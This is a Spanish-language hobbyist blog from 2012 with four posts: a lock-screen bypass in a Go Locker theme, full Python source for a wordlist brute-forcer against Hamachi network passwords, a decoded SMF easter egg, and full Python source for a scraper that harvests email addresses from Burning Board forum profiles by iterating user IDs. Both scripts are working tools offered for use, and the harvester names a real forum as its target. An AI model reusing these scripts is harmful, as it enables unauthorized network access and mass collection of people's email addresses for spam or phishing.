jueves, 26 de enero de 2012

GO Locker bypass

Bueno, ahora les voy a platicar un poco sobre una aplicación para Android, se llama Go Launcher, esta sirve en pocas palabras para que nuestro lanzador de aplicaciones en el telefono se vea "fancy" (xDD), este a su vez tiene algunos plugins de complemento, uno de ellos se llama Go Locker.

Go Locker sirve para que nuestro telefono al blockearse tambien se vea rockeroso, la configuración de los temas depende de su creador, algunos dan más opciones, otros ninguno, etc, etc.

Hoy jugando con el teléfono y "tuneandolo" instalé varios temas para cuando se bloquea, entre ellos nombro algunos por si quieren descargarlos:


Golden New Year
Dark
3D Worm -> (este es del que hablaremos)

Y claro, tambien tiene instalado el default.

El que les menciono arriba tiene un aspecto genial (a mi parecer), es un gusano en 3d que camina por su pantalla y para desbloquear el teléfono ustedes tienen que cortarlo a la mitad :D, tipo fruit ninja pero con gusanos! 

Esta es una captura de pantalla:


Me gusta mucho el aspecto y casi se hace mi lock screen por default, pero! (si, siempre hay un pero x_X) este lockscreen tiene un bypass, en los telefonos con android como todos saben (o al menos espero la mayoría, y en caso de que no, ya lo saben por que lo estan leyendo! xD) al dejar presionada la tecla de menú, se abre el administrador de tareas, para que puedan ver sus aplicaciones activas, ó, las aplicaciones que abrieron recientemente, con este tema al presionar la tecla pasa lo siguiente:


( La imagen se ve cortada, no se por que, pero sale completa :P )

Whooops! security broken x_X, se supone que bloquea las acciones del teléfono (más bien, las acciones de las teclas :P) !.

Despues de aparecer esa pantalla, podemos ingresar a cualquier aplicación que este ahí, aunque este la opción de que nos pida un pin ó un patrón (de cuando dibujas una secuencia en pantalla).

Probe con más temas que instalé y no tienen problema, por lo que supongo es nada mas de este lockscreen, imagino para los desarrolladores solamente es agregar una excepción para la tecla menú y listo. 

Bueno, despues de leer todo esto, solo quiero comentar que no por que una aplicación se vea bien, la usen, y esten siempre al tanto de la seguridad de sus datos y la privacidad de los mismos! :D  

Espero que se hayan entretenido el tiempo que tardaron en leer la entrada, ya que no hay devoluciones de minutos en este blog u_U, y sí, el titulo es un poco alarmista, pero vamos! quiero dinero de adsense jajajaja! 

Komtec1

martes, 24 de enero de 2012

Hamachi Brute Force

Como eso de tomar litro y medio de café (aprox) no deja nada bueno, me puse a hacer este pequeño código, es un bruteforce para Hamachi, esta hecho en python, funciona con un wordlist y mediante argv, la forma de ejecutarlo es la siguiente: 

python hamachibf.py nombredered /ruta/archivo/wordlistpass.txt

El script esta probado en linux, sobre windows no se si funcione (no creo) ya que utilizo la forma de ingresar a una red en hamachi desde consola por linux, y no se si en windows sea igual, en caso de que si sea lo mismo, pues funcionaría :P 

Si encuentra el password los va a loguear de manera automática a la red.

Dejo una captura de pantalla, el codigo, el enlace para pastebin y creo que nada más :P 



#!/usr/bin/python
import socket
import urllib2
import sys
import os
import string
import urllib
import re
import subprocess

class Command(object):

    def __init__(self, command):
        self.command = command 

    def run(self, shell=True):
        import subprocess as sp
        process = sp.Popen(self.command, shell = shell, stdout = sp.PIPE, stderr = sp.PIPE)
        self.pid = process.pid
        self.output, self.error = process.communicate()
        self.failed = process.returncode
        return self

    @property
    def returncode(self):
        return self.failed

print '|-----| Komtec1 komtec1[at]gmail[dot]com |------|'
print '|-----|    Hamachi password bruteforce   |------|'
red = sys.argv[1]
archivo = sys.argv[2]
num = 0
try:
f = open(archivo)
print 'Todo bien, sigamos con el code'
except :
print 'No se puede leer el archivo'
#resultado = os.system('ls /home')
while True:
linea = f.readline()
if not linea: break
resultado = Command('hamachi join ' + red + ' ' + linea).run()
res2 = resultado.output
if res2.find("failed") >= 0:
print resultado.output + ' pass: ' + linea
else:
print 'Password encontrado: ' + linea
sys.exit(0)


PD recuerden que blogspot no respeta algunas veces la identación/sangrado, por lo que recomiendo lo vean en pastebin


Espero les funcione para algo! :P 

Saludos! 

Komtec1

martes, 17 de enero de 2012

Alguien ha visto a los Oompa Loompas? (I am an Oompa Loompa - SMF)

Este es un codigo en base64 que me encontre en smf, en si es un easter egg!

                        if (!isset($area['force_menu_into_arms_of_another_menu']) && $user_info['name'] == 'iamanoompaloompa')
                            $menu_context['sections'][$section_id]['areas'][$area_id] = unserialize(base64_decode('YTozOntzOjU6ImxhYmVsIjtzOjEyOiJPb21wYSBMb29tcGEiO3M6MzoidXJsIjtzOjQzOiJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL09vbXBhX0xvb21wYXM/IjtzOjQ6Imljb24iO3M6ODY6IjxpbWcgc3JjPSJodHRwOi8vd3d3LnNpbXBsZW1hY2hpbmVzLm9yZy9pbWFnZXMvb29tcGEuZ2lmIiBhbHQ9IkknbSBhbiBPb21wYSBMb29tcGEiIC8+Ijt9'));

a:3:{s:5:"label";s:12:"Oompa Loompa";s:3:"url";s:43:"http://en.wikipedia.org/wiki/Oompa_Loompas?";s:4:"icon";s:86:"I'm an Oompa Loompa";}

Bueno, tenia que postearlo :P

Saludos!

Komtec1

viernes, 13 de enero de 2012

Burning Board 2.2.2 mail xtrakt0r

Bueno, el día de hoy estaba de ocioso, me aburri de programar un sistema en el que ando y me puse a programar un extractor de mails con python, creo que si es un poco mas rápida la ejecución de codigo que con php, aparte que hace rato no hacia nada con python, entonces pues no esta mal de vez en cuando :P

El código es sencillo, espero les guste y les sirva de algo, en caso de que no, al menos se haya entretenido leyendo el parrafo anterior! xD :P

Imagen de como se ve:




#inicio del code --------------


#/usr/local/bin/python
# -*- coding: utf-8 -*-
import os
import urllib
import string
import re
import sys
import time
import datetime
import random
t0 = time.clock()
correito = re.compile('([\w\-\.]+@(\w[\w\-]+\.)+[\w\-]+)')
print 'Burning Board 2.2.2 mail xtrakt0r'
print '------------Komtec1--------------'
print '-----komtec1[at]gmail[dot]com----'
print '\n Ingresa el nombre con el que vas a guardar el archivo'
nombre = raw_input("")
print '\n Ingresa la url completa ej: http://sitio.com/forums/profile.php?userid='
url = raw_input("")
print '\ Ingresa el numero inicial, si lo dejas en blanco comienza en 1'
inicial = raw_input("")
if inicial == '':
    inicial = 0
print 'Si sabes el numero final de usuarios ingresalo, o ingresa el numero maximo de intentos Ej: 315000'
usuarios = raw_input("")
print 'Espera un momento, el script se esta ejecutando'
if usuarios == '':
    print 'Voy a sacar el numero de usuarios    '
else:
    for x in range(int(inicial), int(usuarios)):
        mail = ''
        urlf = url + str(x)
        chek = urllib.urlopen(urlf)
        chek2 = chek.read()
        if x%100 == 0:
            print x
        if chek2.find("This address/url is invalid. If you clicked on a link, please inform the") >= 0:
            mail = ''
        else:
            mail = correito.findall(chek2)
            if len(mail) == 1:
                f = open (nombre+".txt", "a")
                f.write(str(mail) + '\n')
                f.close()
                print mail
             
print "%.2f sec" % (time.clock() - t0)




#fin del code ------

les dejo el enlace por cualquier cosa:  


http://pastebin.com/3bqTaTfU


No esta de más mencionar que el codigo va a servir cuando en el servidor el correo se muestre, por ejemplo aqui: 


http://www.romnation.net/forums/profile.php?userid=215204


De hecho esa página fue la "inspiradora" para hacer el codigo xD :P 


Saludos!!!  :D :D :D :D 

PD: Ya hice dos modificaciones al codigo! :D (20:25 -  13/01/2012)


Komtec1